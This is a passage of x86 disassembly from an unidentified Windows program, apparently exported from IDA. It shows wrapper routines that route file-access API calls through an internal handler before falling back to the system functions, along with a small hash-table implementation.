push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_49C2A9: ; CODE XREF: sub_49C277+27�j
mov eax, [ebp+var_4]
leave
retn 4
sub_49C277 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C2B0 proc near ; CODE XREF: sub_402DD7+68�p
; sub_40494F+A7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_14]
and eax, 40000000h
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_491346
test eax, eax
jnz short loc_49C2F7
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A26A8 ; CreateFileA
mov [ebp+var_4], eax
loc_49C2F7: ; CODE XREF: sub_49C2B0+27�j
mov eax, [ebp+var_4]
leave
retn 1Ch
sub_49C2B0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FAF0
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
and dword ptr [ebp-20h], 0
or dword ptr [ebp-1Ch], 0FFFFFFFFh
and dword ptr [ebp-4], 0
push 104h
call sub_49935A
pop ecx
mov [ebp-28h], eax
mov eax, [ebp-28h]
mov [ebp-20h], eax
xor eax, eax
mov edi, [ebp-20h]
stosd
push 0
push 0
push 104h
push dword ptr [ebp-20h]
push 0FFFFFFFFh
push dword ptr [ebp+8]
push 0
push 0
call ds:dword_4A27B8 ; WideCharToMultiByte
mov [ebp-24h], eax
cmp dword ptr [ebp-24h], 103h
ja short loc_49C388
push 0
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp+18h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp-20h]
call sub_491346
test eax, eax
jnz short loc_49C3A6
loc_49C388: ; CODE XREF: _4:0049C36E�j
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_4A26AC ; CreateFileW
mov [ebp-1Ch], eax
loc_49C3A6: ; CODE XREF: _4:0049C386�j
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_49C3B1
jmp short loc_49C3C1
; =============== S U B R O U T I N E =======================================
sub_49C3B1 proc near ; CODE XREF: _4:0049C3AA�p
; DATA XREF: _5:0049FAF8�o
mov eax, [ebp-20h]
mov [ebp-2Ch], eax
push dword ptr [ebp-2Ch]
call sub_4993DD
pop ecx
retn
sub_49C3B1 endp
; ---------------------------------------------------------------------------
loc_49C3C1: ; CODE XREF: _4:0049C3AF�j
mov eax, [ebp-1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 1Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C3D5 proc near ; CODE XREF: sub_402DD7+120�p
; sub_402DD7+150�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_491741
test eax, eax
jnz short loc_49C3F5
push [ebp+arg_0]
call ds:dword_4A26A4 ; CloseHandle
mov [ebp+var_4], eax
loc_49C3F5: ; CODE XREF: sub_49C3D5+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_49C3D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C3FC proc near ; CODE XREF: sub_402DD7+135�p
; sub_40494F+1A9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_492177
test eax, eax
jnz short loc_49C436
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A277C ; ReadFile
mov [ebp+var_4], eax
jmp short loc_49C459
; ---------------------------------------------------------------------------
loc_49C436: ; CODE XREF: sub_49C3FC+1E�j
cmp [ebp+arg_10], 0
jz short loc_49C459
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 0
jnz short loc_49C459
mov eax, [ebp+arg_10]
cmp dword ptr [eax+10h], 0
jz short loc_49C459
mov eax, [ebp+arg_10]
push dword ptr [eax+10h]
call ds:dword_4A2784 ; SetEvent
loc_49C459: ; CODE XREF: sub_49C3FC+38�j
; sub_49C3FC+3E�j ...
mov eax, [ebp+var_4]
leave
retn 14h
sub_49C3FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C460 proc near ; CODE XREF: sub_406A0D+6C�p
; sub_40C512+259�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_491421
test eax, eax
jnz short loc_49C491
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A2788 ; SetFilePointer
mov [ebp+var_4], eax
jmp short loc_49C49D
; ---------------------------------------------------------------------------
loc_49C491: ; CODE XREF: sub_49C460+18�j
cmp [ebp+arg_8], 0
jz short loc_49C49D
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
loc_49C49D: ; CODE XREF: sub_49C460+2F�j
; sub_49C460+35�j
mov eax, [ebp+var_4]
leave
retn 10h
sub_49C460 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C4A4 proc near ; CODE XREF: sub_40AAFA+25�p
; DATA XREF: _1:off_424114�o ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_49C4BE
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_491216
test eax, eax
jnz short loc_49C4D9
loc_49C4BE: ; CODE XREF: sub_49C4A4+8�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A26B0 ; CreateFileMappingA
mov [ebp+var_4], eax
loc_49C4D9: ; CODE XREF: sub_49C4A4+18�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_49C4A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C4E0 proc near ; DATA XREF: _6:004A22B0�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_49C4FA
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_491216
test eax, eax
jnz short loc_49C515
loc_49C4FA: ; CODE XREF: sub_49C4E0+8�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A26B4 ; CreateFileMappingW
mov [ebp+var_4], eax
loc_49C515: ; CODE XREF: sub_49C4E0+18�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_49C4E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C51C proc near ; CODE XREF: sub_40AAFA+36�p
; DATA XREF: _1:off_424000�o ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_490FBF
test eax, eax
jnz short loc_49C554
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A276C ; MapViewOfFile
mov [ebp+var_4], eax
loc_49C554: ; CODE XREF: sub_49C51C+1E�j
mov eax, [ebp+var_4]
leave
retn 14h
sub_49C51C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C55B proc near ; CODE XREF: sub_40AAFA+69�p
; DATA XREF: _1:off_424110�o ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_490ECD
test eax, eax
jnz short loc_49C57B
push [ebp+arg_0]
call ds:dword_4A27A0 ; UnmapViewOfFile
mov [ebp+var_4], eax
loc_49C57B: ; CODE XREF: sub_49C55B+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_49C55B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C582 proc near ; DATA XREF: _6:004A2328�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0
push [ebp+arg_0]
call sub_491346
test eax, eax
jz short loc_49C610
cmp [ebp+arg_4], 0
jz short loc_49C60B
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
cmp eax, 88h
jnz short loc_49C60B
mov eax, [ebp+arg_4]
mov byte ptr [eax+1], 1
mov eax, [ebp+arg_4]
and word ptr [eax+2], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
cmp [ebp+var_8], 7Fh
jnb short loc_49C5E0
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
jmp short loc_49C5E7
; ---------------------------------------------------------------------------
loc_49C5E0: ; CODE XREF: sub_49C582+54�j
mov [ebp+var_10], 7Fh
loc_49C5E7: ; CODE XREF: sub_49C582+5C�j
mov ecx, [ebp+var_10]
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
add edi, 8
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_4]
and byte ptr [eax+87h], 0
loc_49C60B: ; CODE XREF: sub_49C582+22�j
; sub_49C582+2F�j
mov eax, [ebp+var_4]
jmp short loc_49C630
; ---------------------------------------------------------------------------
loc_49C610: ; CODE XREF: sub_49C582+1C�j
push offset dword_49F5B4
push offset aOpenfile ; "OpenFile"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_C]
loc_49C630: ; CODE XREF: sub_49C582+8C�j
pop edi
pop esi
leave
retn 0Ch
sub_49C582 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C636 proc near ; DATA XREF: _6:004A2330�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0
push [ebp+arg_0]
call sub_491346
test eax, eax
jz short loc_49C656
mov eax, [ebp+var_4]
jmp short locret_49C673
; ---------------------------------------------------------------------------
loc_49C656: ; CODE XREF: sub_49C636+19�j
push offset dword_49F5B4
push offset a_lopen ; "_lopen"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_8]
locret_49C673: ; CODE XREF: sub_49C636+1E�j
leave
retn 8
sub_49C636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C677 proc near ; DATA XREF: _6:004A2338�o
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
movzx eax, ds:byte_4A70E4
and eax, 1
test eax, eax
jnz short loc_49C6AB
mov al, ds:byte_4A70E4
or al, 1
mov ds:byte_4A70E4, al
push offset dword_49F5B4
push offset a_lclose ; "_lclose"
call sub_49AC22
pop ecx
pop ecx
mov ds:dword_4A70E0, eax
loc_49C6AB: ; CODE XREF: sub_49C677+10�j
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_491741
test eax, eax
jnz short loc_49C6C6
push [ebp+arg_0]
call ds:dword_4A70E0
jmp short locret_49C6C8
; ---------------------------------------------------------------------------
loc_49C6C6: ; CODE XREF: sub_49C677+42�j
xor eax, eax
locret_49C6C8: ; CODE XREF: sub_49C677+4D�j
leave
retn 4
sub_49C677 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C6CC proc near ; DATA XREF: _6:004A2348�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_491421
test eax, eax
jnz short loc_49C70A
push offset dword_49F5B4
push offset a_llseek ; "_llseek"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_49C70A: ; CODE XREF: sub_49C6CC+19�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_49C6CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C711 proc near ; DATA XREF: _6:004A2340�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_4]
push eax
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_492177
test eax, eax
jnz short loc_49C763
push offset dword_49F5B4
push offset a_lread ; "_lread"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_C]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_49C763
mov [ebp+var_4], 1
loc_49C763: ; CODE XREF: sub_49C711+20�j
; sub_49C711+49�j
cmp [ebp+var_4], 0
jnz short loc_49C76F
or [ebp+var_10], 0FFFFFFFFh
jmp short loc_49C775
; ---------------------------------------------------------------------------
loc_49C76F: ; CODE XREF: sub_49C711+56�j
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
loc_49C775: ; CODE XREF: sub_49C711+5C�j
mov eax, [ebp+var_10]
leave
retn 0Ch
sub_49C711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C77C proc near ; CODE XREF: sub_493DD0+6C7�p
; sub_493DD0+70D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_8]
and dword ptr [eax+0Ch], 0
mov eax, [ebp+arg_0]
shl eax, 2
push eax
call sub_49935A
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+8], ecx
mov eax, [ebp+var_8]
add eax, 10h
push eax
call ds:dword_4A274C ; InitializeCriticalSection
mov eax, [ebp+var_8]
leave
retn 4
sub_49C77C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C7C0 proc near ; CODE XREF: sub_49C82A+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], ecx
and [ebp+var_4], 0
jmp short loc_49C7D6
; ---------------------------------------------------------------------------
loc_49C7CF: ; CODE XREF: sub_49C7C0:loc_49C824�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_49C7D6: ; CODE XREF: sub_49C7C0+D�j
mov eax, [ebp+var_14]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jnb short locret_49C826
mov eax, [ebp+var_14]
mov eax, [eax+8]
mov ecx, [ebp+var_4]
mov eax, [eax+ecx*4]
mov [ebp+var_8], eax
loc_49C7EF: ; CODE XREF: sub_49C7C0+62�j
cmp [ebp+var_8], 0
jz short loc_49C824
cmp [ebp+arg_0], 0
jz short loc_49C804
mov eax, [ebp+var_8]
push dword ptr [eax]
call [ebp+arg_0]
pop ecx
loc_49C804: ; CODE XREF: sub_49C7C0+39�j
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_8], eax
mov eax, [ebp+var_C]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_4993DD
pop ecx
jmp short loc_49C7EF
; ---------------------------------------------------------------------------
loc_49C824: ; CODE XREF: sub_49C7C0+33�j
jmp short loc_49C7CF
; ---------------------------------------------------------------------------
locret_49C826: ; CODE XREF: sub_49C7C0+1E�j
leave
retn 4
sub_49C7C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C82A proc near ; CODE XREF: sub_496070+51�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
push 0
mov ecx, [ebp+var_8]
call sub_49C7C0
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_4], eax
push [ebp+var_4]
call sub_4993DD
pop ecx
mov eax, [ebp+var_8]
add eax, 10h
push eax
call ds:dword_4A2750 ; RtlDeleteCriticalSection
leave
retn
sub_49C82A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C85D proc near ; DATA XREF: sub_49C871+C�o
; sub_49C8E0+C�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor ecx, ecx
cmp eax, [ebp+arg_4]
setnz cl
mov eax, ecx
pop ebp
retn 8
sub_49C85D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C871 proc near ; CODE XREF: sub_490036+94�p
; sub_4906DE+63�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_49CAFE
push offset sub_49C85D
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_49C891
leave
retn 4
sub_49C871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C891 proc near ; CODE XREF: sub_4968CF+20�p
; sub_49C871+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_8]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov ecx, [ecx+8]
mov eax, [ecx+eax*4]
mov [ebp+var_4], eax
loc_49C8B2: ; CODE XREF: sub_49C891+47�j
cmp [ebp+var_4], 0
jz short loc_49C8DA
push [ebp+arg_0]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call [ebp+arg_4]
test eax, eax
jnz short loc_49C8CF
mov eax, [ebp+var_4]
mov eax, [eax]
jmp short locret_49C8DC
; ---------------------------------------------------------------------------
loc_49C8CF: ; CODE XREF: sub_49C891+35�j
mov eax, [ebp+var_4]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_49C8B2
; ---------------------------------------------------------------------------
loc_49C8DA: ; CODE XREF: sub_49C891+25�j
xor eax, eax
locret_49C8DC: ; CODE XREF: sub_49C891+3C�j
leave
retn 0Ch
sub_49C891 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C8E0 proc near ; CODE XREF: sub_490818+93�p
; sub_490D24+106�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_49CAFE
push offset sub_49C85D
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_49C900
leave
retn 4
sub_49C8E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C900 proc near ; CODE XREF: sub_496FCD+F1�p
; sub_49C8E0+17�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_18], ecx
mov eax, [ebp+var_18]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_8]
pop ecx
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_18]
mov eax, [eax+8]
mov ecx, [ebp+var_C]
mov eax, [eax+ecx*4]
mov [ebp+var_8], eax
mov eax, [ebp+var_18]
mov eax, [eax+8]
mov ecx, [ebp+var_C]
lea eax, [eax+ecx*4]
mov [ebp+var_4], eax
loc_49C937: ; CODE XREF: sub_49C900+86�j
cmp [ebp+var_8], 0
jz short loc_49C988
push [ebp+arg_0]
mov eax, [ebp+var_8]
push dword ptr [eax+4]
call [ebp+arg_4]
test eax, eax
jnz short loc_49C974
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov ecx, [ecx+8]
mov [eax], ecx
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
push [ebp+var_14]
call sub_4993DD
pop ecx
mov eax, [ebp+var_10]
jmp short locret_49C98A
; ---------------------------------------------------------------------------
loc_49C974: ; CODE XREF: sub_49C900+4B�j
mov eax, [ebp+var_8]
add eax, 8
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_8], eax
jmp short loc_49C937
; ---------------------------------------------------------------------------
loc_49C988: ; CODE XREF: sub_49C900+3B�j
xor eax, eax
locret_49C98A: ; CODE XREF: sub_49C900+72�j
leave
retn 0Ch
sub_49C900 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C98E proc near ; CODE XREF: sub_48D000+3E�p
; sub_491216+D8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_49CAFE
push offset sub_49C85D
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_49C9B1
leave
retn 8
sub_49C98E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C9B1 proc near ; CODE XREF: sub_496BD7+204�p
; sub_49C98E+1A�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push edi
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_C]
pop ecx
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_8]
mov eax, [eax+ecx*4]
mov [ebp+var_4], eax
loc_49C9DA: ; CODE XREF: sub_49C9B1+52�j
cmp [ebp+var_4], 0
jz short loc_49CA05
push [ebp+arg_0]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call [ebp+arg_8]
test eax, eax
jnz short loc_49C9FA
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [eax], ecx
jmp short loc_49CA62
; ---------------------------------------------------------------------------
loc_49C9FA: ; CODE XREF: sub_49C9B1+3D�j
mov eax, [ebp+var_4]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_49C9DA
; ---------------------------------------------------------------------------
loc_49CA05: ; CODE XREF: sub_49C9B1+2D�j
push 0Ch
call sub_49935A
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_49CA26
xor eax, eax
mov edi, [ebp+var_C]
stosd
stosd
stosd
mov eax, [ebp+var_C]
mov [ebp+var_14], eax
jmp short loc_49CA2A
; ---------------------------------------------------------------------------
loc_49CA26: ; CODE XREF: sub_49C9B1+63�j
and [ebp+var_14], 0
loc_49CA2A: ; CODE XREF: sub_49C9B1+73�j
mov eax, [ebp+var_14]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax+4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [eax], ecx
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_4]
mov edx, [ebp+var_8]
mov eax, [eax+edx*4]
mov [ecx+8], eax
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_8]
mov edx, [ebp+var_4]
mov [eax+ecx*4], edx
loc_49CA62: ; CODE XREF: sub_49C9B1+47�j
pop edi
leave
retn 10h
sub_49C9B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49CA67 proc near ; CODE XREF: sub_4956D0+6F�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
and dword ptr [eax+0Ch], 0
leave
retn
sub_49CA67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49CA7E proc near ; CODE XREF: sub_4956D0+82�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
loc_49CA85: ; CODE XREF: sub_49CA7E+5D�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov eax, [eax+4]
cmp eax, [ecx]
jb short loc_49CA96
xor al, al
jmp short locret_49CAFA
; ---------------------------------------------------------------------------
loc_49CA96: ; CODE XREF: sub_49CA7E+12�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+0Ch], 0
jnz short loc_49CAB6
mov eax, [ebp+var_4]
mov eax, [eax+4]
mov ecx, [ebp+var_4]
mov ecx, [ecx+8]
mov edx, [ebp+var_4]
mov eax, [ecx+eax*4]
mov [edx+0Ch], eax
jmp short loc_49CAC5
; ---------------------------------------------------------------------------
loc_49CAB6: ; CODE XREF: sub_49CA7E+1F�j
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_4]
mov eax, [eax+8]
mov [ecx+0Ch], eax
loc_49CAC5: ; CODE XREF: sub_49CA7E+36�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+0Ch], 0
jnz short loc_49CADD
mov eax, [ebp+var_4]
mov eax, [eax+4]
inc eax
mov ecx, [ebp+var_4]
mov [ecx+4], eax
jmp short loc_49CA85
; ---------------------------------------------------------------------------
loc_49CADD: ; CODE XREF: sub_49CA7E+4E�j
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_0]
mov eax, [eax+4]
mov [ecx], eax
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov eax, [eax]
mov [ecx], eax
mov al, 1
locret_49CAFA: ; CODE XREF: sub_49CA7E+16�j
leave
retn 8
sub_49CA7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49CAFE proc near ; DATA XREF: sub_49C871+7�o
; sub_49C8E0+7�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
mov eax, edx
pop ebp
retn
sub_49CAFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49CB0D proc near ; DATA XREF: sub_4968CF+C�o
; sub_496BD7+1ED�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
